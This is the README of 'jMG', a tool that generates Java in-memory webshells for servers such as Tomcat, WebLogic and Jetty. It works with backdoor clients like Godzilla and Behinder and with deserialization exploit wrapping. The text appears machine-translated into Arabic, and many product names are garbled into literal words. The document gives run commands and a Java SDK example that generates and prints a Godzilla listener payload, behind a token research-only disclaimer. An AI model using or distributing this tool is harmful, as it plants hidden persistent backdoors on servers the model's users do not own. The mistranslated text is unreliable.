أداة توليد حصان ذاكرة جافا قابلة للتخصيص بدرجة كبيرة
تحذير
هذه الأداة مخصصة لأغراض البحث والتعلم الأمني فقط. يتحمل المستخدمون جميع المسؤوليات القانونية والمسؤوليات ذات الصلة الناشئة عن استخدام هذه الأداة. يرجى التأكد من أن أفعالك تتوافق مع القوانين واللوائح المحلية. المؤلف لا يتحمل أي مسؤولية. إذا كنت لا تقبل هذا، يرجى عدم استخدام هذه الأداة.
الوسيطة | إطار | الأدوات (الإصدار التجريبي) | نوع حصان الذاكرة | تنسيق الإخراج | الوحدة المساعدة |
---|---|---|---|---|---|
هر | SpringMVC | سيف النمل (2.1.15) | المستمع | قاعدة64 | التعبئة والتغليف الضعف الخاصة |
الراتنج | SpringWebFlux | خلف (4.0.7) | فلتر | BCEL | تغليف بيان التعبير |
ويب لوجيك | جودزيلا (4.0.1) | المعترض | بيجينتجر | ||
رصيف | نيو ري جورج (5.1.0) | HandlerMethod | فصل | ||
ويب سفير | سو5 (0.9.0) | TomcatValve | جرة | ||
تحت | مخصص | JAR_AGENT | |||
سمكة زجاجية | شبيبة | ||||
JSP |
مخضرم (v3.9.3)
تجميع حزمة mvn: فردي
رسومية
java -jar ./releases/jmg-gui-1.0.8.jar
سطر الأوامر
java -jar ./releases/jmg-cli-1.0.8.jar
البرنامج المساعد نقار الخشب
أضف jmg-woodpecker-1.0.8.jar إلى دليل المكونات الإضافية لنقار الخشب
مكتبة الطرف الثالث (Maven)
1. قم بتثبيت jmg-sdk-1.0.8.jar على مستودع maven المحلي
تثبيت mvn: ملف التثبيت -Dfile=./releases/jmg-sdk-1.0.8.jar -DgroupId=jmg -DartifactId=jmg-sdk -Dversion=1.0.8 -Dpackaging=jar
2. أضف تبعية
<التبعية> <groupId>jmg</groupId> <artifactId>jmg-sdk</artifactId> <الإصدار>1.0.8</الإصدار> </التبعية>
3.مثال
// 基础配置 AbstractConfig config = new AbstractConfig() {{ // 设置工具类型 setToolType(Constants.TOOL_GODZILLA); // 设置中间件 or 框架 setServerType(Constants.SERVER_TOMCAT); // 设置内存马类型 setShellType(Constants.SHELL_LISTENER); // 设置输出格式为 BASE64 setOutputFormat(Constants.FORMAT_BASE64); // 设置漏洞利用封装,默认不启用 setGadgetType(Constants.GADGET_NONE); // 初始化基础配置 build(); }}; jMGenerator generator = new jMGenerator(config); generator.genPayload(); generator.printPayload(); // 连接信息 SDKResultUtil.printBasicInfo(config); SDKResultUtil.printDebugInfo(config);
جي ام جي v1.0.8
جي ام جي v1.0.6
جي ام جي v1.0.5
جي ام جي v1.0.4
https://github.com/c0ny1
https://github.com/whwlsfb
https://github.com/feihong-cs/memShell
https://github.com/su18/MemoryShell
https://github.com/BeichenDream/GodzillaMemoryShellProject
معهد ماساتشوستس للتكنولوجيا